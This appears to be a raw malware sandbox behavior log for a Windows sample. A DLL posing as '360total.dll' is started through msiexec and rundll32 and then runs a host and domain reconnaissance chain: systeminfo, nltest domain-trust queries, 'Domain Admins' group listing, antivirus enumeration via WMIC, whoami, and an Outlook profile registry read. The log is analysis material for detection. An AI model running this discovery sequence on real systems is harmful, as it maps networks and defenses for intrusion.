Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,12555166688129216027,17064817212319626723,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1952,i,10714614445797353568,16368385931931740060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\systeminfo.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding B0AF98778AC35F634802E620BDCA3C21
Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\Installer\MSI181.tmp "C:\Windows\Installer\MSI181.tmp" C:/Windows/System32/rundll32.exe C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\Installer\MSI181.tmp Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\sharepoint\360total.dll, homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\AppData\Roaming\Custom_update\Update_cd47bedf.dll", homq
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c ipconfig /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c systeminfo
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net view /all
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c net config workstation
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName | findstr /V /B /C:displayName || echo No Antivirus installed
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\cmd.exe /c whoami /groups
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1996,i,12555166688129216027,17064817212319626723,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=1952,i,10714614445797353568,16368385931931740060,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srpapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: dlnashext.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: wpdshext.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\Installer\MSI181.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\ipconfig.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: esscli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\nltest.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\nltest.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\nltest.exe Section loaded: netutils.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\nltest.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\nltest.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
